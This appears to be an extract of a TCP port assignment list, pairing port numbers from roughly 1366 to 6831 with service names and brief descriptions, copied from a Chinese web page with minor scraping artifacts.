1366/tcp netware-csp Novell NetWare Comm Service Platform
1367/tcp dcs DCS
1368/tcp screencast ScreenCast
1369/tcp gv-us GlobalView to Unix Shell
1370/tcp us-gv Unix Shell to GlobalView
1371/tcp fc-cli Fujitsu Config Protocol
1372/tcp fc-ser Fujitsu Config Protocol
1373/tcp chromagrafx Chromagrafx
1374/tcp molly EPI Software Systems
1375/tcp bytex Bytex
1376/tcp ibm-pps IBM Person to Person Software
1377/tcp cichlid Cichlid License Manager
1378/tcp elan Elan License Manager
1379/tcp dbreporter Integrity Solutions
1380/tcp telesis-licman Telesis Network License Manager
1381/tcp apple-licman Apple Network License Manager
1382/tcp udt_os
1383/tcp gwha GW Hannaway Network License Manager
1384/tcp os-licman Objective Solutions License Manager
1385/tcp atex_elmd Atex Publishing License Manager
1386/tcp checksum CheckSum License Manager
1387/tcp cadsi-lm Computer Aided Design Software Inc LM
1388/tcp objective-dbc Objective Solutions DataBase Cache
1389/tcp iclpv-dm document.nbspManager
1390/tcp iclpv-sc Storage Controller
1391/tcp iclpv-sas Storage Access Server
1392/tcp iclpv-pm Print Manager
1393/tcp iclpv-nls Network Log Server
1394/tcp iclpv-nlc Network Log Client
1395/tcp iclpv-wsm PC Workstation Manager software
1396/tcp dvl-activemail DVL Active Mail
1399/tcp cadkey-licman Cadkey License Manager
常见端口说明:
1400/tcp cadkey-tablet Cadkey Tablet Daemon
1402/tcp prm-sm-np Prospero Resource Manager
1403/tcp prm-nm-np Prospero Resource Manager
1404/tcp igi-lm Infinite Graphics License Manager
1405/tcp ibm-res IBM Remote Execution Starter
1406/tcp netlabs-lm NetLabs License Manager
1407/tcp dbsa-lm DBSA License Manager
1408/tcp sophia-lm Sophia License Manager
1409/tcp here-lm Here License Manager
1410/tcp hiq HiQ License Manager
1411/tcp af AudioFile
1412/tcp innosys InnoSys
1413/tcp innosys-acl Innosys-ACL
1414/tcp ibm-mqseries IBM MQSeries
1415/tcp dbstar DBStar
1416/tcp novell-lu6.2 Novell LU6.2
1417/tcp timbuktu-srv1 Timbuktu Service 1 Port
1418/tcp timbuktu-srv2 Timbuktu Service 2 Port
1419/tcp timbuktu-srv3 Timbuktu Service 3 Port
1420/tcp timbuktu-srv4 Timbuktu Service 4 Port
1421/tcp gandalf-lm Gandalf License Manager
1422/tcp autodesk-lm Autodesk License Manager
1423/tcp essbase Essbase Arbor Software
1424/tcp hybrid Hybrid Encryption Protocol
1425/tcp zion-lm Zion Software License Manager
1426/tcp sais Satellite-data Acquisition System 1
1427/tcp mloadd mloadd monitoring tool
1428/tcp informatik-lm Informatik License Manager
1429/tcp nms Hypercom NMS
1430/tcp tpdu Hypercom TPDU
1431/tcp rgtp Reverse Gossip Transport
1432/tcp blueberry-lm Blueberry Software License Manager
1433/tcp ms-sql-s Microsoft-SQL-Server
1434/tcp ms-sql-m Microsoft-SQL-Monitor
1435/tcp ibm-cics IBM CICS
1436/tcp saism Satellite-data Acquisition System 2
1437/tcp tabula Tabula
1438/tcp eicon-server Eicon Security Agent/Server
1439/tcp eicon-x25 Eicon X25/SNA Gateway
1440/tcp eicon-slp Eicon Service Location Protocol
1441/tcp cadis-1 Cadis License Management
1442/tcp cadis-2 Cadis License Management
1443/tcp ies-lm Integrated Engineering Software
1444/tcp marcam-lm Marcam License Management
1445/tcp proxima-lm Proxima License Manager
1446/tcp ora-lm Optical Research Associates License Manager
1447/tcp apri-lm Applied Parallel Research LM
1448/tcp oc-lm OpenConnect License Manager
1449/tcp peport PEport
1450/tcp dwf Tandem Distributed Workbench Facility
1451/tcp infoman IBM Information Management
1452/tcp gtegsc-lm GTE Government Systems License Man
1453/tcp genie-lm Genie License Manager
1454/tcp interhdl_elmd interHDL License Manager
1455/tcp esl-lm ESL License Manager
1456/tcp dca DCA
1457/tcp valisys-lm Valisys License Manager
1458/tcp nrcabq-lm Nichols Research Corp.
1459/tcp proshare1 Proshare Notebook Application
1460/tcp proshare2 Proshare Notebook Application
1461/tcp ibm_wrless_lan IBM Wireless LAN
1462/tcp world-lm World License Manager
1463/tcp nucleus Nucleus
1464/tcp msl_lmd MSL License Manager
1465/tcp pipes Pipes Platform
1466/tcp oceansoft-lm Ocean Software License Manager
1467/tcp csdmbase CSDMBASE
1468/tcp csdm CSDM
1469/tcp aal-lm Active Analysis Limited License Manager
1470/tcp uaiact Universal Analytics
1471/tcp csdmbase csdmbase
1472/tcp csdm csdm
1473/tcp openmath OpenMath
1474/tcp telefinder Telefinder
1475/tcp taligent-lm Taligent License Manager
1476/tcp clvm-cfg clvm-cfg
1477/tcp ms-sna-server ms-sna-server
1478/tcp ms-sna-base ms-sna-base
1479/tcp dberegister dberegister
1480/tcp pacerforum PacerForum
1481/tcp airs AIRS
1482/tcp miteksys-lm Miteksys License Manager
1483/tcp afs AFS License Manager
1484/tcp confluent Confluent License Manager
1485/tcp lansource LANSource
1486/tcp nms_topo_serv nms_topo_serv
1487/tcp localinfosrvr LocalInfoSrvr
1488/tcp docstor DocStor
1489/tcp dmdocbroker dmdocbroker
1490/tcp insitu-conf insitu-conf
1491/tcp anynetgateway anynetgateway
1492/tcp stone-design-1 stone-design-1
1493/tcp netmap_lm netmap_lm
1494/tcp ica ica
1495/tcp cvc cvc
1496/tcp liberty-lm liberty-lm
1497/tcp rfx-lm rfx-lm
1498/tcp sybase-sqlany Sybase SQL Any
1499/tcp fhc Federico Heinz Consultora
1500/tcp vlsi-lm VLSI License Manager
1501/tcp saiscm Satellite-data Acquisition System 3
1502/tcp shivadiscovery Shiva
1503/tcp imtc-mcs Databeam
1504/tcp evb-elm EVB Software Engineering License Manager
1505/tcp funkproxy Funk Software, Inc.
1506/tcp utcd Universal Time daemon (utcd)
1507/tcp symplex symplex
1508/tcp diagmond diagmond
1509/tcp robcad-lm Robcad, Ltd. License Manager
1510/tcp mvx-lm Midland Valley Exploration Ltd. Lic. Man.
1511/tcp 3l-l1 3l-l1
1512/tcp wins Microsoft‘s Windows Internet Name Service
1513/tcp fujitsu-dtc Fujitsu Systems Business of America, Inc
1514/tcp fujitsu-dtcns Fujitsu Systems Business of America, Inc
1515/tcp ifor-protocol ifor-protocol
1516/tcp vpad Virtual Places Audio data
1517/tcp vpac Virtual Places Audio control
1518/tcp vpvd Virtual Places Video data
1519/tcp vpvc Virtual Places Video control
1520/tcp atm-zip-office atm zip office
1521/tcp ncube-lm nCube License Manager
1522/tcp ricardo-lm Ricardo North America License Manager
1523/tcp cichild-lm cichild
1525/tcp orasrv oracle
1525/tcp prospero-np Prospero Directory Service non-priv
1526/tcp pdap-np Prospero Data Access Prot non-priv
1527/tcp tlisrv oracle
1528/tcp mciautoreg micautoreg
1529/tcp coauthor oracle
1530/tcp rap-service rap-service
1531/tcp rap-listen rap-listen
1532/tcp miroconnect miroconnect
1533/tcp virtual-places Virtual Places Software
1534/tcp micromuse-lm micromuse-lm
1535/tcp ampr-info ampr-info
1536/tcp ampr-inter ampr-inter
1537/tcp sdsc-lm isi-lm
1538/tcp 3ds-lm 3ds-lm
1539/tcp intellistor-lm Intellistor License Manager
1540/tcp rds rds
1541/tcp rds2 rds2
1542/tcp gridgen-elmd gridgen-elmd
1543/tcp simba-cs simba-cs
1544/tcp aspeclmd aspeclmd
1545/tcp vistium-share vistium-share
1546/tcp abbaccuray abbaccuray
1547/tcp laplink laplink
1548/tcp axon-lm Axon License Manager
1549/tcp shivahose Shiva Hose
1550/tcp 3m-image-lm Image Storage license manager 3M Company
1551/tcp hecmtl-db HECMTL-DB
1552/tcp pciarray pciarray
1553/tcp sna-cs sna-cs
1554/tcp caci-lm CACI Products Company License Manager
1555/tcp livelan livelan
1556/tcp ashwin AshWin CI Tecnologies
1557/tcp arbortext-lm ArborText License Manager
1558/tcp xingmpeg xingmpeg
1559/tcp web2host web2host
1560/tcp asci-val asci-val
1561/tcp facilityview facilityview
1562/tcp pconnectmgr pconnectmgr
1563/tcp cadabra-lm Cadabra License Manager
1564/tcp pay-per-view Pay-Per-View
1565/tcp winddlb WinDD
1566/tcp corelvideo CORELVIDEO
1567/tcp jlicelmd jlicelmd
1568/tcp tsspmap tsspmap
1569/tcp ets ets
1570/tcp orbixd orbixd
1571/tcp rdb-dbs-disp Oracle Remote Data Base
1572/tcp chip-lm Chipcom License Manager
1573/tcp itscomm-ns itscomm-ns
1574/tcp mvel-lm mvel-lm
1575/tcp oraclenames oraclenames
1576/tcp moldflow-lm moldflow-lm
1577/tcp hypercube-lm hypercube-lm
1578/tcp jacobus-lm Jacobus License Manager
1579/tcp ioc-sea-lm ioc-sea-lm
1580/tcp tn-tl-r1 tn-tl-r1
1581/tcp mil-2045-47001 MIL-2045-47001
1582/tcp msims MSIMS
1583/tcp simbaexpress simbaexpress
1584/tcp tn-tl-fd2 tn-tl-fd2
1585/tcp intv intv
1586/tcp ibm-abtact ibm-abtact
1587/tcp pra_elmd pra_elmd
1588/tcp triquest-lm triquest-lm
1589/tcp vqp VQP
1590/tcp gemini-lm gemini-lm
1591/tcp ncpm-pm ncpm-pm
1592/tcp commonspace commonspace
1593/tcp mainsoft-lm mainsoft-lm
1594/tcp sixtrak sixtrak
1595/tcp radio radio
1596/tcp radio-sm radio-sm
1597/tcp orbplus-iiop orbplus-iiop
1598/tcp picknfs picknfs
1599/tcp simbaservices simbaservices
1600/tcp issd
1601/tcp aas aas
1602/tcp inspect inspect
1603/tcp picodbc pickodbc
1604/tcp icabrowser icabrowser
1605/tcp slp Salutation Manager (Salutation Protocol)
1606/tcp slm-api Salutation Manager (SLM-API)
1607/tcp stt stt
1608/tcp smart-lm Smart Corp. License Manager
1609/tcp isysg-lm isysg-lm
1610/tcp taurus-wh taurus-wh
1611/tcp ill Inter Library Loan
1612/tcp netbill-trans NetBill Transaction Server
1613/tcp netbill-keyrep NetBill Key Repository
1614/tcp netbill-cred NetBill Credential Server
1615/tcp netbill-auth NetBill Authorization Server
1616/tcp netbill-prod NetBill Product Server
1617/tcp nimrod-agent Nimrod Inter-Agent Communication
1618/tcp skytelnet skytelnet
1619/tcp xs-openstorage xs-openstorage
1620/tcp faxportwinport faxportwinport
1621/tcp softdataphone softdataphone
1622/tcp ontime ontime
1623/tcp jaleosnd jaleosnd
1624/tcp udp-sr-port udp-sr-port
1625/tcp svs-omagent svs-omagent
1636/tcp cncp CableNet Control Protocol
1637/tcp cnap CableNet Admin Protocol
1638/tcp cnip CableNet Info Protocol
1639/tcp cert-initiator cert-initiator
1640/tcp cert-responder cert-responder
1641/tcp invision InVision
1642/tcp isis-am isis-am
1643/tcp isis-ambc isis-ambc
1645/tcp datametrics datametrics
1646/tcp sa-msg-port sa-msg-port
1647/tcp rsap rsap
1648/tcp concurrent-lm concurrent-lm
1649/tcp inspect inspect
1650/tcp nkd nkd
1651/tcp shiva_confsrvr shiva_confsrvr
1652/tcp xnmp xnmp
1653/tcp alphatech-lm alphatech-lm
1654/tcp stargatealerts stargatealerts
1655/tcp dec-mbadmin dec-mbadmin
1656/tcp dec-mbadmin-h dec-mbadmin-h
1657/tcp fujitsu-mmpdc fujitsu-mmpdc
1658/tcp sixnetudr sixnetudr
1659/tcp sg-lm Silicon Grail License Manager
1660/tcp skip-mc-gikreq skip-mc-gikreq
1661/tcp netview-aix-1 netview-aix-1
1662/tcp netview-aix-2 netview-aix-2
1663/tcp netview-aix-3 netview-aix-3
1664/tcp netview-aix-4 netview-aix-4
1665/tcp netview-aix-5 netview-aix-5
1666/tcp netview-aix-6 netview-aix-6
1667/tcp netview-aix-7 netview-aix-7
1668/tcp netview-aix-8 netview-aix-8
1669/tcp netview-aix-9 netview-aix-9
1670/tcp netview-aix-10 netview-aix-10
1671/tcp netview-aix-11 netview-aix-11
1672/tcp netview-aix-12 netview-aix-12
1673/tcp proshare-mc-1 Intel Proshare Multicast
1674/tcp proshare-mc-2 Intel Proshare Multicast
1675/tcp pdp Pacific Data Products
1676/tcp netcomm1 netcomm1
1677/tcp groupwise groupwise
1678/tcp prolink prolink
1679/tcp darcorp-lm darcorp-lm
1681/tcp sd-elmd sd-elmd
1682/tcp lanyon-lantern lanyon-lantern
1683/tcp ncpm-hip ncpm-hip
1684/tcp snaresecure SnareSecure
1685/tcp n2nremote n2nremote
1686/tcp cvmon cvmon
1687/tcp nsjtp-ctrl nsjtp-ctrl
1688/tcp nsjtp-data nsjtp-data
1689/tcp firefox firefox
1690/tcp ng-umds ng-umds
1691/tcp empire-empuma empire-empuma
1692/tcp sstsys-lm sstsys-lm
1693/tcp rrirtr rrirtr
1694/tcp rrimwm rrimwm
1695/tcp rrilwm rrilwm
1696/tcp rrifmm rrifmm
1697/tcp rrisat rrisat
1698/tcp rsvp-encap-1 RSVP-ENCAPSULATION-1
1699/tcp rsvp-encap-2 RSVP-ENCAPSULATION-2
1700/tcp mps-raft mps-raft
1701/tcp l2f,l2tp l2f,l2tp
1702/tcp deskshare deskshare
1703/tcp hb-engine hb-engine
1704/tcp bcs-broker bcs-broker
1705/tcp slingshot slingshot
1706/tcp jetform jetform
1707/tcp vdmplay vdmplay
1708/tcp gat-lmd gat-lmd
1709/tcp centra centra
1710/tcp impera impera
1711/tcp pptconference pptconference
1712/tcp registrar resource monitoring service
1713/tcp conferencetalk ConferenceTalk
1714/tcp sesi-lm sesi-lm
1715/tcp houdini-lm houdini-lm
1716/tcp xmsg xmsg
1717/tcp fj-hdnet fj-hdnet
1718/tcp h323gatedisc h323gatedisc
1719/tcp h323gatestat h323gatestat
1720/tcp h323hostcall h323hostcall
1721/tcp caicci caicci
1722/tcp hks-lm HKS License Manager
1723/tcp pptp pptp
1724/tcp csbphonemaster csbphonemaster
1725/tcp iden-ralp iden-ralp
1726/tcp iberiagames IBERIAGAMES
1727/tcp winddx winddx
1728/tcp telindus TELINDUS
1729/tcp citynl CityNL License Management
1730/tcp roketz roketz
1731/tcp msiccp MSICCP
1732/tcp proxim proxim
1733/tcp siipat SIMS - SIIPAT Protocol for Alarm Transmission
1734/tcp cambertx-lm Camber Corporation License Management
1735/tcp privatechat PrivateChat
1736/tcp street-stream street-stream
1737/tcp ultimad ultimad
1738/tcp gamegen1 GameGen1
1739/tcp webaccess webaccess
1740/tcp encore encore
1741/tcp cisco-net-mgmt cisco-net-mgmt
1742/tcp 3Com-nsd 3Com-nsd
1743/tcp cinegrfx-lm Cinema Graphics License Manager
1744/tcp ncpm-ft ncpm-ft
1745/tcp remote-winsock remote-winsock
1746/tcp ftrapid-1 ftrapid-1
1747/tcp ftrapid-2 ftrapid-2
1748/tcp oracle-em1 oracle-em1
1749/tcp aspen-services aspen-services
1750/tcp sslp Simple Socket Library‘s PortMaster
1751/tcp swiftnet SwiftNet
1752/tcp lofr-lm Leap of Faith Research License Manager
1753/tcp translogic-lm Translogic License Manager
1754/tcp oracle-em2 oracle-em2
1755/tcp ms-streaming ms-streaming
1756/tcp capfast-lmd capfast-lmd
1757/tcp cnhrp cnhrp
1758/tcp tftp-mcast tftp-mcast
1759/tcp spss-lm SPSS License Manager
1760/tcp www-ldap-gw www-ldap-gw
1761/tcp cft-0 cft-0
1762/tcp cft-1 cft-1
1763/tcp cft-2 cft-2
1764/tcp cft-3 cft-3
1765/tcp cft-4 cft-4
1766/tcp cft-5 cft-5
1767/tcp cft-6 cft-6
1768/tcp cft-7 cft-7
1769/tcp bmc-net-adm bmc-net-adm
1770/tcp bmc-net-svc bmc-net-svc
1771/tcp vaultbase vaultbase
1772/tcp essweb-gw EssWeb Gateway
1773/tcp kmscontrol KMSControl
1774/tcp global-dtserv global-dtserv
1776/tcp femis Federal Emergency Management Information System
1777/tcp powerguardian powerguardian
1779/tcp pharmasoft pharmasoft
1780/tcp dpkeyserv dpkeyserv
1781/tcp answersoft-lm answersoft-lm
1782/tcp hp-hcip hp-hcip
1783/tcp fjris Fujitsu Remote Install Service
1784/tcp finle-lm Finle License Manager
1785/tcp windlm Wind River Systems License Manager
1786/tcp funk-logger funk-logger
1787/tcp funk-license funk-license
1788/tcp psmond psmond
1789/tcp hello hello
1790/tcp nmsp Narrative Media Streaming Protocol
1791/tcp ea1 EA1
1792/tcp ibm-dt-2 ibm-dt-2
1793/tcp rsc-robot rsc-robot
1794/tcp cera-bcm cera-bcm
1795/tcp dpi-proxy dpi-proxy
1796/tcp vocaltec-admin Vocaltec Server Administration
1797/tcp uma UMA
1798/tcp etp Event Transfer Protocol
1799/tcp netrisk NETRISK
1801/tcp msmq Microsoft Message Que
1804/tcp enl ENL
1807/tcp fhsp Fujitsu Hot Standby Protocol
1812/tcp radius RADIUS
1813/tcp radius-acct RADIUS Accounting
1814/tcp tdp-suite TDP Suite
1815/tcp mmpft MMPFT
1816/tcp harp HARP
1818/tcp etftp Enhanced Trivial File Transfer Protocol
1819/tcp plato-lm Plato License Manager
1820/tcp mcagent mcagent
1821/tcp donnyworld donnyworld
1822/tcp es-elmd es-elmd
1823/tcp unisys-lm Unisys Natural Language License Manager
1824/tcp metrics-pas metrics-pas
1850/tcp gsi GSI
1863/tcp msnp MSNP
1865/tcp entp ENTP
1901/tcp fjicl-tep-a Fujitsu ICL Terminal Emulator Program A
1902/tcp fjicl-tep-b Fujitsu ICL Terminal Emulator Program B
1903/tcp linkname Local Link Name Resolution
1904/tcp fjicl-tep-c Fujitsu ICL Terminal Emulator Program C
1905/tcp sugp Secure UP.Link Gateway Protocol
1906/tcp tpmd TPortMapperReq
1908/tcp dawn Dawn
1911/tcp mtp Starlight Networks Multimedia Transport Protocol
1913/tcp armadp armadp
1914/tcp elm-momentum Elm-Momentum
1915/tcp facelink FACELINK
1916/tcp persona Persoft Persona
1917/tcp noagent nOAgent
1921/tcp noadmin NoAdmin
1944/tcp close-combat close-combat
1945/tcp dialogic-elmd dialogic-elmd
1946/tcp tekpls tekpls
1947/tcp hlserver hlserver
1948/tcp eye2eye eye2eye
1949/tcp ismaeasdaqlive ISMA Easdaq Live
1950/tcp ismaeasdaqtest ISMA Easdaq Test
1951/tcp bcs-lmserver bcs-lmserver
1973/tcp dlsrap Data Link Switching Remote Access Protocol
1985/tcp hsrp Hot Standby Router Protocol
1986/tcp licensedaemon cisco license management
1987/tcp tr-rsrb-p1 cisco RSRB Priority 1 port
1988/tcp tr-rsrb-p2 cisco RSRB Priority 2 port
1989/tcp tr-rsrb-p3 cisco RSRB Priority 3 port
1989/tcp mshnet MHSnet system
1990/tcp stun-p1 cisco STUN Priority 1 port
1991/tcp stun-p2 cisco STUN Priority 2 port
1992/tcp stun-p3 cisco STUN Priority 3 port
1992/tcp ipsendmsg IPsendmsg
1993/tcp snmp-tcp-port cisco SNMP TCP port
1994/tcp stun-port cisco serial tunnel port
1995/tcp perf-port cisco perf port
1996/tcp tr-rsrb-port cisco Remote SRB port
1997/tcp gdp-port cisco Gateway Discovery Protocol
1998/tcp x25-svc-port cisco X.25 service (XOT)
1999/tcp tcp-id-port cisco identification port
2000/tcp callbook
2001/tcp dc
2002/tcp globe
2004/tcp mailbox
2005/tcp berknet
2007/tcp dectalk
2012/tcp ttyinfo
2013/tcp raid-am
2014/tcp troff
2015/tcp cypress
2025/tcp ellpack
2030/tcp device2
2032/tcp blackboard
2033/tcp glogger
2035/tcp imsldoc
2040/tcp lam
2042/tcp isis isis
2044/tcp rimsl
2045/tcp cdfunc
2046/tcp sdfunc
2047/tcp dls
2049/tcp shilp
2049/tcp nfs Network File System - Sun Microsystems
2065/tcp dlsrpn Data Link Switch Read Port Number
2067/tcp dlswpn Data Link Switch Write Port Number
2090/tcp lrp Load Report Protocol
2091/tcp prp PRP
2102/tcp zephyr-srv Zephyr server
2103/tcp zephyr-clt Zephyr serv-hm connection
2104/tcp zephyr-hm Zephyr hostmanager
2105/tcp minipay MiniPay
2200/tcp ici ICI
2201/tcp ats Advanced Training System Program
2213/tcp kali Kali
2222/tcp unreg-ab2 Allen-Bradley unregistered port
2232/tcp ivs-video IVS Video default
2234/tcp directplay DirectPlay
2236/tcp nani Nani
2240/tcp recipe RECIPe
2241/tcp ivsd IVS Daemon
2242/tcp foliocorp Folio Remote Server
2279/tcp xmquery xmquery
2280/tcp lnvpoller LNVPOLLER
2281/tcp lnvconsole LNVCONSOLE
2282/tcp lnvalarm LNVALARM
2283/tcp lnvstatus LNVSTATUS
2284/tcp lnvmaps LNVMAPS
2285/tcp lnvmailmon LNVMAILMON
2286/tcp nas-metering NAS-Metering
2287/tcp dna DNA
2288/tcp netml NETML
2300/tcp cvmmon CVMMON
2307/tcp pehelp pehelp
2308/tcp sdhelp sdhelp
2313/tcp iapp IAPP (Inter Access Point Protocol)
2316/tcp sent-lm SENT License Manager
2321/tcp rdlap RDLAP over UDP
2322/tcp ofsd ofsd
2323/tcp 3d-nfsd 3d-nfsd
2326/tcp idcp IDCP
2327/tcp xingcsm xingcsm
2329/tcp nvd NVD
2330/tcp tscchat TSCCHAT
2333/tcp snapp SNAPP
2337/tcp ideesrv ideesrv
2344/tcp fcmsys fcmsys
2345/tcp dbm dbm
2356/tcp gxtelmd GXT License Managemant
2358/tcp futrix Futrix
2390/tcp rsmtp RSMTP
2396/tcp wusage Wusage
2397/tcp ncl NCL
2398/tcp orbiter Orbiter
2401/tcp cvspserver cvspserver
2407/tcp orion Orion
2412/tcp cdn CDN
2415/tcp comtest COMTEST
2418/tcp cas cas
2421/tcp g-talk G-Talk
2423/tcp rnrp RNRP
2427/tcp stgcp Simple telephony Gateway Control Protocol
2428/tcp ott One Way Trip Time
2429/tcp ft-role FT-ROLE
2430/tcp venus venus
2432/tcp codasrv codasrv
2436/tcp topx TOP/X
2438/tcp msp MSP
2443/tcp powerclientcsf PowerClient Central Storage Facility
2445/tcp dtn1 DTN1
2447/tcp ovwdb OpenView NNM daemon
2449/tcp ratl RATL
2451/tcp netchat netchat
2458/tcp griffin griffin
2500/tcp rtsserv Resource Tracking system server
2501/tcp rtsclient Resource Tracking system client
2528/tcp ncr_ccl NCR CCL
2529/tcp utsftp UTS FTP
2532/tcp ovtopmd OVTOPMD
2592/tcp netrek netrek
2628/tcp dict DICT
2634/tcp pk-electronics PK Electronics
2636/tcp solve Solve
2639/tcp aminet AMInet
2641/tcp hdl-srv HDL Server
2642/tcp tragic Tragic
2646/tcp and-lm AND Licence Manager
2653/tcp sonus Sonus
2655/tcp unglue UNIX Nt Glue
2656/tcp kana Kana
2700/tcp tqdata tqdata
2784/tcp www-dev world wide web - development
2785/tcp aic-np aic-np
2786/tcp aic-oncrpc aic-oncrpc - Destiny MCD database
2787/tcp piccolo piccolo - Cornerstone Software
2788/tcp fryeserv NetWare Loadable Module - Seagate Software
2789/tcp media-agent Media Agent
2908/tcp mao mao
2912/tcp epicon Epicon
2971/tcp netclip Net Clip
2974/tcp signal Signal
2975/tcp fjmpcm Fujitsu Configuration Management Service
3000/tcp hbci HBCI
3001/tcp redwood-broker Redwood Broker
3003/tcp cgms CGMS
3010/tcp gw Telerate Workstation
3012/tcp twsdss Trusted Web Client
3020/tcp cifs CIFS
3047/tcp hlserver Fast Security HL Server
3048/tcp pctrader Sierra Net PC Trader
3049/tcp nsws NSWS
3105/tcp cardbox Cardbox
3130/tcp icpv2 ICPv2
3141/tcp vmodem VMODEM
3143/tcp seaview Sea View
3147/tcp rfio RFIO
3264/tcp ccmail cc:mail/lotus
3266/tcp ns-cfg-server NS CFG Server
3267/tcp ibm-dial-out IBM Dial Out
3268/tcp msft-gc Microsoft Global Catalog
3273/tcp sxmp Simple Extensible Multiplexed Protocol
3275/tcp samd SAMD
3279/tcp admind admind
3281/tcp sysopt SYSOPT
3284/tcp 4talk 4Talk
3285/tcp plato Plato
3286/tcp e-net E-Net
3288/tcp cops COPS
3289/tcp enpc ENPC
3290/tcp caps-lm CAPS LOGISTICS TOOLKIT - LM
3291/tcp sah-lm S A Holditch & Associates - LM
3293/tcp fg-fps fg-fps
3294/tcp fg-gip fg-gip
3296/tcp rib-slm Rib License Manager
3299/tcp pdrncs pdrncs
3304/tcp opsession-srvr OP Session Server
3306/tcp mysql MySQL
3309/tcp tns-adv TNS ADV
3313/tcp uorb Unify Object Broker
3314/tcp uohost Unify Object Host
3315/tcp cdid CDID
3318/tcp ssrip Swith to Swith Routing Information Protocol
3319/tcp sdt-lmd SDT License Manager
3321/tcp vnsstr VNSSTR
3326/tcp sftu SFTU
3327/tcp bbars BBARS
3328/tcp egptlm Eaglepoint License Manager
3329/tcp hp-device-disc HP Device Disc
3330/tcp mcs-calypsoicf MCS Calypso ICF
3333/tcp dec-notes DEC Notes
3338/tcp anet-b OMF data b
3339/tcp anet-l OMF data l
3340/tcp anet-m OMF data m
3341/tcp anet-h OMF data h
3342/tcp webtie WebTIE
3351/tcp btrieve BTRIEVE
3352/tcp ssql SSQL
3353/tcp fatpipe FATPIPE
3354/tcp suitjd SUITJD
3362/tcp dj-ilm DJ ILM
3372/tcp tip2 TIP 2
3378/tcp wsicopy WSICOPY
3379/tcp socorfs SOCORFS
3381/tcp geneous Geneous
3383/tcp esp-lm Enterprise Software Products License Manager
3390/tcp dsc Distributed Service Coordinator
3391/tcp savant SAVANT
3392/tcp efi-lm EFI License Management
3395/tcp dyna-lm Dyna License Manager (Elam)
3421/tcp bmap Bull Apprise portmapper
3455/tcp prsvp RSVP Port
3456/tcp vat VAT default data
3457/tcp vat-control VAT default control
3900/tcp udt_os Unidata UDT OS
3984/tcp mapper-nodemgr MAPPER network node manager
3985/tcp mapper-mapethd MAPPER TCP/IP server
3986/tcp mapper-ws_ethd MAPPER workstation server
4001/tcp newoak NewOak
4008/tcp netcheque NetCheque accounting
4096/tcp bre BRE (Bridge Relay Element)
4132/tcp nuts_dem NUTS Daemon
4133/tcp nuts_bootp NUTS Bootp Server
4143/tcp oidsr document.nbspReplication
4321/tcp rwhois Remote Who Is
4343/tcp unicall UNICALL
4346/tcp elanlm ELAN LM
4348/tcp itose ITOSE
4444/tcp krb524 KRB524
4444/tcp nv-video NV Video default
4446/tcp n1-fwp N1-FWP
4449/tcp privatewire PrivateWire
4450/tcp camp Camp
4451/tcp ctisystemmsg CTI System Msg
4452/tcp ctiprogramload CTI Program Load
4500/tcp sae-urn sae-urn
4501/tcp urn-x-cdchoice urn-x-cdchoice
4546/tcp sf-lm SF License Manager (Sentinel)
4672/tcp rfa remote file access server
4800/tcp iims Icona Instant Messenging System
4801/tcp iwec Icona Web Embedded Chat
4802/tcp ilss Icona License System Server
4827/tcp htcp HTCP
4868/tcp phrelay Photon Relay
4885/tcp abbs ABBS
5002/tcp rfe radio free ethernet
5003/tcp fmpro-internal FileMaker, Inc. - Proprietary transport
5004/tcp avt-profile-1 avt-profile-1
5005/tcp avt-profile-2 avt-profile-2
5010/tcp telelpathstart TelepathStart
5020/tcp zenginkyo-1 zenginkyo-1
5021/tcp zenginkyo-2 zenginkyo-2
5050/tcp mmcc multimedia conference control tool
5060/tcp sip SIP
5150/tcp atmp Ascend Tunnel Management Protocol
5190/tcp aol America-Online
5191/tcp aol-1 AmericaOnline1
5192/tcp aol-2 AmericaOnline2
5193/tcp aol-3 AmericaOnline3
5272/tcp pk PK
5300/tcp hacl-hb # HA cluster heartbeat
5301/tcp hacl-gs # HA cluster general services
5304/tcp hacl-local # HA Cluster Commands
5305/tcp hacl-test # HA Cluster Test
5307/tcp sco-aip SCO AIP
5310/tcp outlaws Outlaws
5311/tcp tmlogin TM Login
5400/tcp excerpt Excerpt Search
5402/tcp mftp MFTP
5404/tcp hpoms-dps-lstn HPOMS-DPS-LSTN
5407/tcp foresyte-clear Foresyte-Clear
5409/tcp salient-dtasrv Salient Data Server
5410/tcp salient-usrmgr Salient User Manager
5411/tcp actnet ActNet
5414/tcp statusd StatusD
5418/tcp mcntp MCNTP
5419/tcp dj-ice DJ-ICE
5500/tcp fcp-addr-srvr1 fcp-addr-srvr1
5501/tcp fcp-addr-srvr2 fcp-addr-srvr2
5502/tcp fcp-srvr-inst1 fcp-srvr-inst1
5503/tcp fcp-srvr-inst2 fcp-srvr-inst2
5504/tcp fcp-cics-gw1 fcp-cics-gw1
5555/tcp personal-agent Personal Agent
5602/tcp a1-msc A1-MSC
5603/tcp a1-bs A1-BS
5631/tcp pcanywheredata pcANYWHEREdata
5632/tcp pcanywherestat pcANYWHEREstat
5678/tcp rrac Remote Replication Agent Connection
5679/tcp dccm Direct Cable Connect Manager
5713/tcp proshareaudio proshare conf audio
5714/tcp prosharevideo proshare conf video
5715/tcp prosharedata proshare conf data
5717/tcp prosharenotify proshare conf notify
5729/tcp openmail Openmail User Agent Layer
5741/tcp ida-discover1 IDA Discover Port 1
5742/tcp ida-discover2 IDA Discover Port 2
5745/tcp fcopy-server fcopy-server
5746/tcp fcopys-server fcopys-server
5755/tcp openmailg OpenMail Desk Gateway server
5757/tcp x500ms OpenMail X.500 Directory Server
5766/tcp openmailns OpenMail NewMail Server
5767/tcp s-openmail OpenMail Suer Agent Layer (Secure)
6000/tcp x11 X Window System
6110/tcp softcm HP SoftBench CM
6111/tcp spc HP SoftBench Sub-Process Control
6112/tcp dtspcd dtspcd
6123/tcp backup-express Backup Express
6141/tcp meta-corp Meta Corporation License Manager
6142/tcp aspentec-lm Aspen Technology License Manager
6143/tcp watershed-lm Watershed License Manager
6144/tcp statsci1-lm StatSci License Manager - 1
6145/tcp statsci2-lm StatSci License Manager - 2
6146/tcp lonewolf-lm Lone Wolf Systems License Manager
6147/tcp montage-lm Montage License Manager
6148/tcp ricardo-lm Ricardo North America License Manager
6149/tcp tal-pod tal-pod
6253/tcp crip CRIP
6389/tcp clariion-evr01 clariion-evr01
6500/tcp boks BoKS Master
6558/tcp xdsxdm
6665/tcp ircu IRCU
6670/tcp vocaltec-gold Vocaltec Global Online Directory
6672/tcp vision_server vision_server
6673/tcp vision_elmd vision_elmd
6790/tcp hnmp HNMP
6831/tcp ambit-lm ambit-lm
